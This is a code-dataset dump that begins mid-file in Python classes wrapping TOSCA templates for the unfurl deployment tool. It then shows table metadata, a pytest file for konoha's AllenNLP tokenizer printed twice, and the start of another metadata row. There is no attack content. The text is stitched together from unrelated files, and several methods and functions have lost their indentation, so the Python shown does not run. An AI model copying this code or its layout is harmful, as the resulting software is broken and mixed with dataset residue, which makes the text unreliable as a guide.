            if nodeName:
                nodeTemplate = self.nodeTemplates.get(nodeName)
                if not nodeTemplate:
                    return None
                return nodeTemplate.get_relationship(requirement)
            else:
                # NOTE(review): this looks up the full mangled name ("~r~X"),
                # while relationshipTemplates appears keyed by plain template
                # names elsewhere -- confirm whether this should use
                # ``requirement`` instead.
                return self.relationshipTemplates.get(name)
        elif "~q~" in name:
            nodeName, requirement = name.split("~q~")
            nodeTemplate = self.nodeTemplates.get(nodeName)
            if not nodeTemplate:
                return None
            return nodeTemplate.get_requirement(requirement)
        elif "~a~" in name:
            nodeTemplate = None
            nodeName, artifactName = name.split("~a~")
            if nodeName:
                nodeTemplate = self.nodeTemplates.get(nodeName)
                if not nodeTemplate:
                    return None
                artifact = nodeTemplate.artifacts.get(artifactName)
                if artifact:
                    return artifact
            # not declared on the node: build an ArtifactSpec from the name
            tpl = self._get_artifact_spec_from_name(artifactName)
            return ArtifactSpec(tpl, nodeTemplate, spec=self)
        else:
            return self.nodeTemplates.get(name)
def _get_artifact_declared_tpl(self, repositoryName, file):
repository = self.nodeTemplates.get(repositoryName)
if repository:
artifact = repository.artifacts.get(file)
if artifact:
return artifact.toscaEntityTemplate.entity_tpl.copy()
return None
    def _get_artifact_spec_from_name(self, name):
        """Convert an encoded artifact name into an artifact template dict.

        The name has the form "[repository]:file" where the file part was
        encoded with ``encode_unfurl_identifier``. If the repository node
        declares a matching artifact, a copy of that declaration is returned;
        otherwise a minimal spec with the file (and repository, if any).

        NOTE(review): ``get_name_from_artifact_spec`` joins repository and
        name with "--" but this splits on ":" -- confirm the encoding used
        by callers.
        """
        repository, sep, file = name.partition(":")
        file = decode_unfurl_identifier(file)
        artifact = self._get_artifact_declared_tpl(repository, file)
        if artifact:
            return artifact
        spec = CommentedMap(file=file)
        if repository:
            spec["repository"] = repository
        return spec
def is_type_name(self, typeName):
return (
typeName in self.template.topology_template.custom_defs
or typeName in EntityType.TOSCA_DEF
)
def find_matching_templates(self, typeName):
for template in self.nodeTemplates.values():
if template.is_compatible_type(typeName):
yield template
    def load_instances(self, toscaDef, tpl):
        """Merge the manifest spec's "installers", "instances" and
        "discovered" sections into the raw template's node_templates.

        Raises UnfurlValidationError if an installer name collides with an
        existing node template; instance and discovered names that collide
        are silently skipped.
        """
        node_templates = toscaDef["topology_template"]["node_templates"]
        for name, impl in tpl.get("installers", {}).items():
            if name not in node_templates:
                node_templates[name] = dict(type=self.InstallerType, properties=impl)
            else:
                raise UnfurlValidationError(
                    f'can not add installer "{name}", there is already a node template with that name'
                )
        for name, impl in tpl.get("instances", {}).items():
            if name not in node_templates and isinstance(impl, dict):
                if "template" not in impl:
                    node_templates[name] = self.instance_to_template(impl.copy())
                elif isinstance(impl["template"], dict):
                    # inline template definition
                    node_templates[name] = impl["template"]
        if "discovered" in tpl:
            # previously discovered templates are readded
            self.discovered = tpl["discovered"]
            for name, impl in tpl["discovered"].items():
                if name not in node_templates:
                    custom_types = impl.pop("custom_types", None)
                    node_templates[name] = impl
                    if custom_types:
                        toscaDef.setdefault("types", CommentedMap()).update(
                            custom_types
                        )
def instance_to_template(self, impl):
if "type" not in impl:
impl["type"] = "unfurl.nodes.Default"
installer = impl.pop("install", None)
if installer:
impl["requirements"] = [{"install": installer}]
return impl
    def import_connections(self, importedSpec):
        """Copy relationship templates from another spec, defaulting their
        ``default_for`` to "ANY" and skipping names already defined here."""
        for template in importedSpec.template.relationship_templates:
            if not template.default_for:
                # connections imported from an environment apply by default
                template.default_for = "ANY"
            relTemplate = RelationshipSpec(template, self)
            if template.name not in self.relationshipTemplates:
                self.relationshipTemplates[template.name] = relTemplate
def find_props(attributes, propertyDefs, matchfn):
    """Recursively yield ``(name, value)`` pairs from ``attributes`` whose
    property definition (or datatype entry definition) satisfies ``matchfn``.

    Scalar properties yield their own name/value; complex datatypes, maps and
    lists recurse into their entries when the entry's datatype has properties
    of its own (map entries yield the map key, list entries yield ``None``).
    """
    if not attributes:
        return
    for prop_def in propertyDefs.values():
        key = prop_def.name
        if key not in attributes:
            continue
        matched = matchfn(prop_def.entry_schema_entity or prop_def.entity)
        if not prop_def.entry_schema:
            if not prop_def.entity.properties:
                # simple (scalar) datatype: only a direct match yields
                if matched:
                    yield key, attributes[key]
                continue
            # complex datatype: yield on match, otherwise recurse into it
            value = attributes[key]
            if matched:
                yield key, value
            elif value:
                yield from find_props(value, prop_def.entity.properties, matchfn)
            continue
        # collection (map or list) with an entry schema
        entry_props = prop_def.entry_schema_entity.properties
        if not matched and not entry_props:
            continue
        value = attributes[key]
        if not value:
            continue
        if prop_def.type == "map":
            for entry_key, entry_val in value.items():
                if matched:
                    yield entry_key, entry_val
                elif entry_props:
                    yield from find_props(entry_val, entry_props, matchfn)
        elif prop_def.type == "list":
            for entry_val in value:
                if matched:
                    yield None, entry_val
                elif entry_props:
                    yield from find_props(entry_val, entry_props, matchfn)
# represents a node, capability or relationship
class EntitySpec(ResourceRef):
    """Base spec class wrapping a toscaparser entity template (node,
    capability, relationship, artifact, group or policy)."""
    # XXX need to define __eq__ for spec changes
    def __init__(self, toscaNodeTemplate, spec=None):
        self.toscaEntityTemplate = toscaNodeTemplate
        self.spec = spec
        self.name = toscaNodeTemplate.name
        if not validate_unfurl_identifier(self.name):
            ExceptionCollector.appendException(
                UnfurlValidationError(
                    f'"{self.name}" is not a valid TOSCA template name',
                    log=True,
                )
            )
        self.type = toscaNodeTemplate.type
        self._isReferencedBy = [] # this is referenced by another template or via property traversal
        # nodes have both properties and attributes
        # as do capability properties and relationships
        # but only property values are declared
        # XXX user should be able to declare default attribute values
        self.propertyDefs = toscaNodeTemplate.get_properties()
        self.attributeDefs = {}
        # XXX test_helm.py fails without making a deepcopy
        # some how chart_values is being modifying outside of a task transaction
        self.properties = copy.deepcopy(
            CommentedMap(
                [(prop.name, prop.value) for prop in self.propertyDefs.values()]
            )
        )
        if toscaNodeTemplate.type_definition:
            # add attributes definitions
            attrDefs = toscaNodeTemplate.type_definition.get_attributes_def()
            self.defaultAttributes = {
                prop.name: prop.default
                for prop in attrDefs.values()
                if prop.name not in ["tosca_id", "state", "tosca_name"]
            }
            for name, aDef in attrDefs.items():
                prop = Property(
                    name, aDef.default, aDef.schema, toscaNodeTemplate.custom_def
                )
                self.propertyDefs[name] = prop
                self.attributeDefs[name] = prop
            # now add any property definitions that haven't been defined yet
            props_def = toscaNodeTemplate.type_definition.get_properties_def()
            for pDef in props_def.values():
                if pDef.schema and pDef.name not in self.propertyDefs:
                    self.propertyDefs[pDef.name] = Property(
                        pDef.name,
                        pDef.default,
                        pDef.schema,
                        toscaNodeTemplate.custom_def,
                    )
        else:
            self.defaultAttributes = {}
    def _resolve(self, key):
        # expression-resolver hook: expose a few public attributes by name
        if key in ["name", "type", "uri", "groups", "policies"]:
            return getattr(self, key)
        raise KeyError(key)
    def get_interfaces(self):
        return self.toscaEntityTemplate.interfaces
    def get_interface_requirements(self):
        return self.toscaEntityTemplate.type_definition.get_interface_requirements(
            self.toscaEntityTemplate.entity_tpl
        )
    @property
    def groups(self):
        """Yield the groups this template is a member of."""
        if not self.spec:
            return
        for g in self.spec.groups.values():
            if self.name in g.members:
                yield g
    @property
    def policies(self):
        # overridden by subclasses that can be policy targets
        return []
    def is_compatible_target(self, targetStr):
        if self.name == targetStr:
            return True
        return self.toscaEntityTemplate.is_derived_from(targetStr)
    def is_compatible_type(self, typeStr):
        return self.toscaEntityTemplate.is_derived_from(typeStr)
    @property
    def uri(self):
        return self.get_uri()
    def get_uri(self):
        # subclasses return mangled names demangled by ToscaSpec.get_template()
        return self.name
    def __repr__(self):
        return f"{self.__class__.__name__}('{self.name}')"
    @property
    def artifacts(self):
        # overridden by subclasses that own artifacts
        return {}
    @staticmethod
    def get_name_from_artifact_spec(artifact_tpl):
        """Derive a unique artifact name ("[repository--]name") from a spec dict."""
        name = artifact_tpl.get(
            "name", encode_unfurl_identifier(artifact_tpl.get("file", ""))
        )
        repository_name = artifact_tpl.get("repository", "")
        if repository_name:
            return repository_name + "--" + name
        else:
            return name
    def find_or_create_artifact(self, nameOrTpl, path=None, predefined=False):
        """Resolve a name or artifact spec dict to an ``ArtifactSpec``.

        Looks in this template's declared artifacts, then in any
        "unfurl.nodes.LocalRepository" templates; otherwise treats the name
        as a file path or URL (unless ``predefined`` requires a known one).
        """
        if not nameOrTpl:
            return None
        if isinstance(nameOrTpl, six.string_types):
            name = nameOrTpl
            artifact = self.artifacts.get(nameOrTpl)
            if artifact:
                return artifact
            repositoryName = ""
        else:
            # and only encode the file and repository in get_name_from_artifact_spec()
            tpl = nameOrTpl
            name = nameOrTpl["file"]
            repositoryName = nameOrTpl.get("repository")
        # if the artifact is defined in a repository, make a copy of it
        if not repositoryName:
            # see if artifact is declared in local repository
            for localStore in self.spec.find_matching_templates(
                "unfurl.nodes.LocalRepository"
            ):
                artifact = localStore.artifacts.get(name)
                if artifact:
                    # found, make a inline copy
                    tpl = artifact.toscaEntityTemplate.entity_tpl.copy()
                    tpl["name"] = name
                    tpl["repository"] = localStore.name
                    break
            else:
                if predefined and not check_class_registry(name):
                    logger.warning(f"no artifact named {name} found")
                    return None
                # otherwise name not found, assume it's a file path or URL
                tpl = dict(file=name)
        else:
            artifact_tpl = self.spec._get_artifact_declared_tpl(repositoryName, name)
            if artifact_tpl:
                tpl = artifact_tpl
                tpl["repository"] = repositoryName
        return ArtifactSpec(tpl, self, path=path)
    @property
    def abstract(self):
        # overridden by NodeSpec ("select"/"substitute" directives)
        return None
    @property
    def directives(self):
        return []
    def find_props(self, attributes, matchfn):
        """Yield (name, value) pairs in ``attributes`` whose property
        definitions match ``matchfn`` (see module-level ``find_props``)."""
        for name, val in find_props(attributes, self.propertyDefs, matchfn):
            yield name, val
    @property
    def base_dir(self):
        """Source directory of this template, falling back to the spec's."""
        if self.toscaEntityTemplate._source:
            return self.toscaEntityTemplate._source
        elif self.spec:
            return self.spec.base_dir
        else:
            return None
    def aggregate_only(self):
        """True if this template has no Standard lifecycle or discover
        operation of its own (i.e. it only aggregates other templates)."""
        for iDef in self.get_interfaces():
            if iDef.interfacename == "Standard":
                return False
            if iDef.interfacename == "Install" and iDef.name == "discover":
                return False
        return True
    @property
    def required(self):
        """True if this template is (transitively) referenced by a root
        template that isn't a defaults-only template."""
        for root in _get_roots(self):
            if self.spec.substitution_template:
                if self.spec.substitution_template is root:
                    return True
            elif 'default' not in root.directives:
                # if don't require if this only has defaults templates as a root
                return True
        return False
def _get_roots(node, seen=None):
if seen is None:
seen = set()
yield node
for parent in node._isReferencedBy:
if parent.name not in seen:
seen.add( node.name )
yield from _get_roots(parent, seen)
class NodeSpec(EntitySpec):
    """Spec wrapper for a TOSCA node template, exposing its capabilities,
    requirements, relationships and artifacts as specs."""
    # has attributes: tosca_id, tosca_name, state, (3.4.1 Node States p.61)
    def __init__(self, template=None, spec=None):
        if not template:
            # no template given: fall back to the default topology's node
            template = next(
                iter(create_default_topology().topology_template.nodetemplates)
            )
            spec = ToscaSpec(create_default_topology())
        else:
            assert spec
        EntitySpec.__init__(self, template, spec)
        # lazily-built caches (see the corresponding properties)
        self._capabilities = None
        self._requirements = None
        self._relationships = []
        self._artifacts = None
    def _resolve(self, key):
        # expression-resolver hook: fall back to requirement names
        try:
            return super()._resolve(key)
        except KeyError:
            req = self.get_requirement(key)
            if not req:
                raise KeyError(key)
            relationship = req.relationship
            # hack!
            relationship.toscaEntityTemplate.entity_tpl = list(req.entity_tpl.values())[
                0
            ]
            return relationship
    @property
    def artifacts(self):
        """Artifacts declared on this node, keyed by name (built lazily)."""
        if self._artifacts is None:
            self._artifacts = {
                name: ArtifactSpec(artifact, self)
                for name, artifact in self.toscaEntityTemplate.artifacts.items()
            }
        return self._artifacts
    @property
    def policies(self):
        """Yield the policies targeting this node directly or via its groups."""
        if not self.spec:
            return
        for p in self.spec.policies.values():
            if p.toscaEntityTemplate.targets_type == "groups":
                # the policy has groups as members, see if this node's groups is one of them
                if p.members & {g.name for g in self.groups}:
                    yield p
            elif p.toscaEntityTemplate.targets_type == "node_templates":
                if self.name in p.members:
                    yield p
    @property
    def requirements(self):
        """Requirement specs keyed by name; building them also registers each
        relationship with its target node (side effect, done once)."""
        if self._requirements is None:
            self._requirements = {}
            nodeTemplate = self.toscaEntityTemplate
            for (relTpl, req, req_type_def) in nodeTemplate.relationships:
                name, values = next(iter(req.items()))
                reqSpec = RequirementSpec(name, req, self, req_type_def)
                if relTpl.target:
                    nodeSpec = self.spec.get_template(relTpl.target.name)
                    if nodeSpec:
                        nodeSpec.add_relationship(reqSpec)
                    else:
                        msg = f'Missing target node "{relTpl.target.name}" for requirement "{name}" on "{self.name}"'
                        ExceptionCollector.appendException(UnfurlValidationError(msg))
                self._requirements[name] = reqSpec
        return self._requirements
    def get_requirement(self, name):
        return self.requirements.get(name)
    def get_relationship(self, name):
        req = self.requirements.get(name)
        if not req:
            return None
        return req.relationship
    @property
    def relationships(self):
        """Relationship specs targeting this node's capabilities."""
        for r in self.toscaEntityTemplate.get_relationship_templates():
            assert r.source
            # accessing source's requirements wires up the relationship specs
            self.spec.get_template(r.source.name).requirements
        return self._get_relationship_specs()
    def _get_relationship_specs(self):
        # refresh the cache if new relationship templates appeared
        if len(self._relationships) != len(
            self.toscaEntityTemplate.get_relationship_templates()
        ):
            rIds = {id(r.toscaEntityTemplate) for r in self._relationships}
            for r in self.toscaEntityTemplate.get_relationship_templates():
                if id(r) not in rIds and r.capability:
                    self._relationships.append(RelationshipSpec(r, self.spec, self))
        return self._relationships
    def get_capability_interfaces(self):
        """Interfaces declared on relationships targeting this node (minus "default")."""
        idefs = [r.get_interfaces() for r in self._get_relationship_specs()]
        return [i for elem in idefs for i in elem if i.name != "default"]
    def get_requirement_interfaces(self):
        """Interfaces declared on this node's requirements (minus "default")."""
        idefs = [r.get_interfaces() for r in self.requirements.values()]
        return [i for elem in idefs for i in elem if i.name != "default"]
    @property
    def capabilities(self):
        """Capability specs keyed by name (built lazily)."""
        if self._capabilities is None:
            self._capabilities = {
                c.name: CapabilitySpec(self, c)
                for c in self.toscaEntityTemplate.get_capabilities_objects()
            }
        return self._capabilities
    def get_capability(self, name):
        return self.capabilities.get(name)
    def add_relationship(self, reqSpec):
        """Pair a source node's RequirementSpec with the matching
        RelationshipSpec on this (target) node."""
        for relSpec in self._get_relationship_specs():
            # to fix this have the RelationshipTemplate remember the name of the requirement
            if (
                relSpec.toscaEntityTemplate.source.name
                == reqSpec.parentNode.toscaEntityTemplate.name
            ):
                assert not reqSpec.relationship or reqSpec.relationship is relSpec, (reqSpec.relationship, relSpec)
                reqSpec.relationship = relSpec
                assert not relSpec.requirement or relSpec.requirement is reqSpec, (relSpec.requirement, reqSpec)
                if not relSpec.requirement:
                    relSpec.requirement = reqSpec
                break
        else:
            msg = f'relationship not found for requirement "{reqSpec.name}" on "{reqSpec.parentNode}" targeting "{self.name}"'
            ExceptionCollector.appendException(UnfurlValidationError(msg))
    @property
    def abstract(self):
        """The "select" or "substitute" directive if present, else None."""
        for name in ("select", "substitute"):
            if name in self.toscaEntityTemplate.directives:
                return name
        return None
    @property
    def directives(self):
        return self.toscaEntityTemplate.directives
class RelationshipSpec(EntitySpec):
    """Spec wrapper for a TOSCA relationship template, linking a
    RequirementSpec (source side) to a CapabilitySpec (target side)."""
    def __init__(self, template=None, spec=None, targetNode=None):
        # template is a RelationshipTemplate
        # It is a full-fledged entity with a name, type, properties, attributes, interfaces, and metadata.
        # its connected through target, source, capability
        # its RelationshipType has valid_target_types
        if not template:
            template = (
                create_default_topology().topology_template.relationship_templates[0]
            )
            spec = ToscaSpec(create_default_topology())
        else:
            assert spec
        EntitySpec.__init__(self, template, spec)
        # assigned later by NodeSpec.add_relationship / capability matching
        self.requirement = None
        self.capability = None
        if targetNode:
            assert targetNode.toscaEntityTemplate is template.target
            for c in targetNode.capabilities.values():
                if c.toscaEntityTemplate is template.capability:
                    self.capability = c
                    break
            else:
                raise UnfurlError(
                    "capability %s not found in %s for %s"
                    % (
                        template.capability.name,
                        [c.name for c in targetNode.capabilities.values()],
                        targetNode.name,
                    )
                )
    @property
    def source(self):
        """The node declaring the requirement, or None if not yet paired."""
        return self.requirement.parentNode if self.requirement else None
    @property
    def target(self):
        """The node owning the target capability, or None if not yet paired."""
        return self.capability.parentNode if self.capability else None
    def _resolve(self, key):
        # expression-resolver hook: fall back to the target node/capability
        try:
            return super()._resolve(key)
        except KeyError:
            if self.capability:
                if self.capability.parentNode.is_compatible_target(key):
                    return self.capability.parentNode
                if self.capability.is_compatible_target(key):
                    return self.capability
            raise KeyError(key)
    def get_uri(self):
        # demangled by ToscaSpec.get_template()
        suffix = "~r~" + self.name
        return self.source.name + suffix if self.source else suffix
    def matches_target(self, capability):
        """True(-thy) if this is a default relationship applying to the given
        capability (via its ``default_for`` declaration)."""
        defaultFor = self.toscaEntityTemplate.default_for
        if not defaultFor:
            return False
        nodeTemplate = capability.parentNode.toscaEntityTemplate
        if (
            defaultFor == self.toscaEntityTemplate.ANY
            or defaultFor == nodeTemplate.name
            or nodeTemplate.is_derived_from(defaultFor)
            or defaultFor == capability.name
            or capability.is_derived_from(defaultFor)
        ):
            return self.toscaEntityTemplate.get_matching_capabilities(
                nodeTemplate, capability.name
            )
        return False
class RequirementSpec:
    """A requirement declared on a node template (the "using" side of a
    relationship).

    ``relationship`` starts as None and is assigned later by
    ``NodeSpec.add_relationship`` when the target node pairs it with the
    matching ``RelationshipSpec``.
    """
    # XXX need __eq__ since this doesn't derive from EntitySpec
    def __init__(self, name, req, parent, type_tpl):
        self.parentNode = parent
        self.source = parent
        self.spec = parent.spec
        self.name = name
        self.entity_tpl = req
        self.relationship = None
        self.type_tpl = type_tpl
    def __repr__(self):
        return f"{self.__class__.__name__}('{self.name}')"
    @property
    def artifacts(self):
        # a requirement exposes its declaring node's artifacts
        return self.parentNode.artifacts
    def get_uri(self):
        # demangled by ToscaSpec.get_template()
        return f"{self.parentNode.name}~q~{self.name}"
    def get_interfaces(self):
        if self.relationship:
            return self.relationship.get_interfaces()
        return []
    def get_nodefilter_properties(self):
        return get_nodefilters(self.type_tpl, "properties")
    def get_nodefilter_requirements(self):
        return get_nodefilters(self.type_tpl, "requirements")
def get_nodefilters(entity_tpl, key):
    """Yield ``(name, value)`` pairs from the given section ("properties" or
    "requirements") of the template's node_filter, if present."""
    if not isinstance(entity_tpl, dict):
        return
    node_filter = entity_tpl.get("node_filter")
    if not node_filter or key not in node_filter:
        return
    for constraint in node_filter[key]:
        # each constraint is a single-entry mapping
        name, value = next(iter(constraint.items()))
        yield name, value
class CapabilitySpec(EntitySpec):
    """Spec wrapper for a capability of a node template (the "providing"
    side of a relationship)."""
    def __init__(self, parent=None, capability=None):
        if not parent:
            parent = NodeSpec()
            capability = parent.toscaEntityTemplate.get_capabilities_objects()[0]
        self.parentNode = parent
        assert capability
        EntitySpec.__init__(self, capability, parent.spec)
        self._relationships = None
        self._defaultRelationships = None
    @property
    def parent(self):
        return self.parentNode
    @property
    def artifacts(self):
        return self.parentNode.artifacts
    def get_interfaces(self):
        # capabilities don't have their own interfaces
        return self.parentNode.get_interfaces()
    def get_uri(self):
        # this is demanagled by getTemplate()
        return self.parentNode.name + "~c~" + self.name
    @property
    def relationships(self):
        """Relationship specs on the parent node targeting this capability."""
        return [r for r in self.parentNode.relationships if r.capability is self]
    @property
    def default_relationships(self):
        """Relationship templates whose ``default_for`` matches this
        capability (computed lazily)."""
        if self._defaultRelationships is None:
            self._defaultRelationships = [
                relSpec
                for relSpec in self.spec.relationshipTemplates.values()
                if relSpec.matches_target(self)
            ]
        return self._defaultRelationships
    def get_default_relationships(self, relation=None):
        """Default relationships, optionally filtered by relationship type."""
        if not relation:
            return self.default_relationships
        return [
            relSpec
            for relSpec in self.default_relationships
            if relSpec.is_compatible_type(relation)
        ]
class TopologySpec(EntitySpec):
    """Spec wrapper for the topology template itself (addressed by the
    reserved name "~topology")."""
    # has attributes: tosca_id, tosca_name, state, (3.4.1 Node States p.61)
    def __init__(self, spec=None, inputs=None):
        if spec:
            self.spec = spec
            template = spec.template.topology_template
        else:
            template = create_default_topology().topology_template
            self.spec = ToscaSpec(create_default_topology())
            self.spec.topology = self
        inputs = inputs or {}
        # note: deliberately does NOT call EntitySpec.__init__; the topology
        # sets up its own (mostly empty) spec attributes below
        self.toscaEntityTemplate = template
        self.name = "~topology"
        self.type = "~topology"
        # declared inputs with supplied values falling back to defaults
        self.inputs = {
            input.name: inputs.get(input.name, input.default)
            for input in template.inputs
        }
        self.outputs = {output.name: output.value for output in template.outputs}
        self.properties = CommentedMap() # XXX implement substitution_mappings
        self.defaultAttributes = {}
        self.propertyDefs = {}
        self.attributeDefs = {}
        self.capabilities = []
        self._defaultRelationships = None
        self._isReferencedBy = []
    def get_interfaces(self):
        # doesn't have any interfaces
        return []
    def is_compatible_target(self, targetStr):
        if self.name == targetStr:
            return True
        return False
    def is_compatible_type(self, typeStr):
        return False
    @property
    def primary_provider(self):
        """The "primary_provider" relationship template, if defined."""
        return self.spec.relationshipTemplates.get("primary_provider")
    @property
    def default_relationships(self):
        """All relationship templates declaring a ``default_for`` target
        (computed lazily)."""
        if self._defaultRelationships is None:
            self._defaultRelationships = [
                relSpec
                for relSpec in self.spec.relationshipTemplates.values()
                if relSpec.toscaEntityTemplate.default_for
            ]
        return self._defaultRelationships
    @property
    def base_dir(self):
        return self.spec.base_dir
    def _resolve(self, key):
        # expression-resolver hook: fall back to node template names, then
        # to the list of templates compatible with ``key`` as a type name
        try:
            return super()._resolve(key)
        except KeyError:
            nodeTemplates = self.spec.nodeTemplates
            nodeSpec = nodeTemplates.get(key)
            if nodeSpec:
                return nodeSpec
            matches = [n for n in nodeTemplates.values() if n.is_compatible_type(key)]
            if not matches:
                raise KeyError(key)
            return matches
class Workflow:
    """Thin wrapper around a toscaparser workflow definition."""
    def __init__(self, workflow):
        self.workflow = workflow
    def __str__(self):
        return f"Workflow({self.workflow.name})"
    def initial_steps(self):
        """Return the entry-point steps: those no other step transitions to."""
        successors = set()
        for step in self.workflow.steps.values():
            successors.update(step.on_success)
            successors.update(step.on_failure)
        return [
            step
            for step in self.workflow.steps.values()
            if step.name not in successors
        ]
    def get_step(self, stepName):
        return self.workflow.steps.get(stepName)
    def match_step_filter(self, stepName, resource):
        """Evaluate the named step's filter against the resource's
        attributes; returns None if the step doesn't exist."""
        step = self.get_step(stepName)
        if not step:
            return None
        return all(cond.evaluate(resource.attributes) for cond in step.filter)
    def match_preconditions(self, resource):
        """True only if every precondition's target resource exists and all
        of its conditions evaluate true."""
        for precondition in self.workflow.preconditions:
            target = resource.root.find_resource(precondition.target)
            if not target:
                return False
            conditions_hold = all(
                cond.evaluate(target.attributes)
                for cond in precondition.condition
            )
            if not conditions_hold:
                return False
        return True
class ArtifactSpec(EntitySpec):
    """Spec wrapper for a TOSCA artifact (a file, possibly in a repository,
    optionally attached to a node template)."""
    # artifact fields that are surfaced as default attributes
    buildin_fields = (
        "file",
        "repository",
        "deploy_path",
        "version",
        "checksum",
        "checksum_algorithm",
        "mime_type",
        "file_extensions",
    )
    def __init__(self, artifact_tpl, template=None, spec=None, path=None):
        self.parentNode = template
        spec = template.spec if template else spec
        if isinstance(artifact_tpl, toscaparser.artifacts.Artifact):
            artifact = artifact_tpl
        else:
            # raw dict: derive a unique name and build a parser Artifact
            name = self.get_name_from_artifact_spec(artifact_tpl)
            artifact_tpl.pop("name", None)
            custom_defs = spec and spec.template.topology_template.custom_defs or {}
            artifact = toscaparser.artifacts.Artifact(
                name, artifact_tpl, custom_defs, path
            )
        EntitySpec.__init__(self, artifact, spec)
        self.repository = (
            spec
            and artifact.repository
            and spec.template.repositories.get(artifact.repository)
            or None
        )
        # map artifacts fields into properties
        for prop in self.buildin_fields:
            self.defaultAttributes[prop] = getattr(artifact, prop)
    def get_uri(self):
        # demangled by ToscaSpec.get_template()
        if self.parentNode:
            return self.parentNode.name + "~a~" + self.name
        else:
            return "~a~" + self.name
    @property
    def file(self):
        return self.toscaEntityTemplate.file
    @property
    def base_dir(self):
        if self.toscaEntityTemplate._source:
            return get_base_dir(self.toscaEntityTemplate._source)
        else:
            return super().base_dir
    def get_path(self, resolver=None):
        """Resolve the artifact to a local path (dropping the fragment)."""
        return self.get_path_and_fragment(resolver)[0]
    def get_path_and_fragment(self, resolver=None, tpl=None):
        """Resolve the artifact's file/repository to a (path, fragment) pair
        using the same machinery as TOSCA imports."""
        tpl = self.spec and self.spec.template.tpl or tpl
        if not resolver and self.spec:
            resolver = self.spec.template.import_resolver
        loader = toscaparser.imports.ImportsLoader(
            None, self.base_dir, tpl=tpl, resolver=resolver
        )
        path, isFile, fragment = loader._resolve_import_template(
            None, self.as_import_spec()
        )
        return path, fragment
    def as_import_spec(self):
        """Represent this artifact as a TOSCA import spec dict."""
        return dict(file=self.file, repository=self.toscaEntityTemplate.repository)
class GroupSpec(EntitySpec):
    """Spec wrapper for a TOSCA group template; ``members`` holds the names
    of its member templates."""
    def __init__(self, template, spec):
        EntitySpec.__init__(self, template, spec)
        self.members = template.members
    # XXX getNodeTemplates() getInstances(), getChildren()
    @property
    def member_groups(self):
        """The members of this group that are themselves groups."""
        return [self.spec.groups[m] for m in self.members if m in self.spec.groups]
    @property
    def policies(self):
        """Yield the policies that target this group."""
        if not self.spec:
            return
        for p in self.spec.policies.values():
            if p.toscaEntityTemplate.targets_type == "groups":
                if self.name in p.members:
                    yield p
class PolicySpec(EntitySpec):
def __init__(self, template, spec):
EntitySpec.__init__(self, template, spec)
self.members = set(template.targets_list)
| true | true |
f7fa563f7239b2037be8bcca3b3bcd0f687e6435 | 1,388 | py | Python | tests/integrations/test_allennlp_integration.py | altescy/konoha | 3870227f7a23913affa429aeea2613b0f6c68d8b | [
"MIT"
] | 149 | 2020-01-23T18:33:06.000Z | 2022-03-27T16:27:44.000Z | tests/integrations/test_allennlp_integration.py | altescy/konoha | 3870227f7a23913affa429aeea2613b0f6c68d8b | [
"MIT"
] | 32 | 2020-01-14T18:03:10.000Z | 2021-12-18T22:42:51.000Z | tests/integrations/test_allennlp_integration.py | altescy/konoha | 3870227f7a23913affa429aeea2613b0f6c68d8b | [
"MIT"
] | 16 | 2020-01-15T08:55:23.000Z | 2021-12-17T18:11:46.000Z | import tempfile
from typing import List, Optional
import allennlp.commands.train
from allennlp.models.basic_classifier import BasicClassifier
import pytest
from konoha.integrations.allennlp import KonohaTokenizer
@pytest.fixture
def raw_text():
    # sample Japanese sentence ("I am a cat", Natsume Soseki) used by the tests
    return "吾輩は猫である"
@pytest.mark.parametrize(
    "token_surfaces,tokenizer_name,mode,model_path", (
        ("吾輩 は 猫 で ある".split(" "), "mecab", None, None),
        ("吾輩 は 猫 で ある".split(" "), "janome", None, None),
        ("吾輩 は 猫 で あ る".split(" "), "kytea", None, None),
        ("▁ 吾 輩 は 猫 である".split(" "), "sentencepiece", None, "data/model.spm"),
        ("吾輩 は 猫 で ある".split(" "), "sudachi", "A", None),
    )
)
def test_allennlp(
    raw_text: str,
    token_surfaces: List[str],
    tokenizer_name: str,
    mode: Optional[str],
    model_path: Optional[str],
) -> None:
    """Each supported backend should yield the expected token surfaces when
    wrapped in the AllenNLP ``KonohaTokenizer`` integration."""
    tokenizer = KonohaTokenizer(
        tokenizer_name=tokenizer_name,
        mode=mode,
        model_path=model_path,
    )
    tokens_konoha = tokenizer.tokenize(raw_text)
    assert token_surfaces == list(t.text for t in tokens_konoha)
def test_allennlp_training():
    """Smoke-test that an AllenNLP model configured with the konoha tokenizer
    trains end-to-end from the fixture config."""
    with tempfile.TemporaryDirectory() as serialization_dir:
        model = allennlp.commands.train.train_model_from_file(
            "test_fixtures/classifier.jsonnet",
            serialization_dir=serialization_dir,
        )
        assert isinstance(model, BasicClassifier)
| 28.326531 | 78 | 0.662824 | import tempfile
from typing import List, Optional
import allennlp.commands.train
from allennlp.models.basic_classifier import BasicClassifier
import pytest
from konoha.integrations.allennlp import KonohaTokenizer
@pytest.fixture
def raw_text():
return "吾輩は猫である"
@pytest.mark.parametrize(
"token_surfaces,tokenizer_name,mode,model_path", (
("吾輩 は 猫 で ある".split(" "), "mecab", None, None),
("吾輩 は 猫 で ある".split(" "), "janome", None, None),
("吾輩 は 猫 で あ る".split(" "), "kytea", None, None),
("▁ 吾 輩 は 猫 である".split(" "), "sentencepiece", None, "data/model.spm"),
("吾輩 は 猫 で ある".split(" "), "sudachi", "A", None),
)
)
def test_allennlp(
raw_text: str,
token_surfaces: List[str],
tokenizer_name: str,
mode: Optional[str],
model_path: Optional[str],
) -> None:
tokenizer = KonohaTokenizer(
tokenizer_name=tokenizer_name,
mode=mode,
model_path=model_path,
)
tokens_konoha = tokenizer.tokenize(raw_text)
assert token_surfaces == list(t.text for t in tokens_konoha)
def test_allennlp_training():
with tempfile.TemporaryDirectory() as serialization_dir:
model = allennlp.commands.train.train_model_from_file(
"test_fixtures/classifier.jsonnet",
serialization_dir=serialization_dir,
)
assert isinstance(model, BasicClassifier)
| true | true |
f7fa56459f92fef474ac7580e88247786ba3d0e8 | 3,363 | py | Python | sdk/keyvault/azure-keyvault/azure/keyvault/v7_3_preview/models/deleted_storage_bundle_py3.py | mccoyp/azure-keyvault-7.3-preview | da351753a9d3d2bf97c27566865cd88bae7faa55 | [
"MIT"
] | null | null | null | sdk/keyvault/azure-keyvault/azure/keyvault/v7_3_preview/models/deleted_storage_bundle_py3.py | mccoyp/azure-keyvault-7.3-preview | da351753a9d3d2bf97c27566865cd88bae7faa55 | [
"MIT"
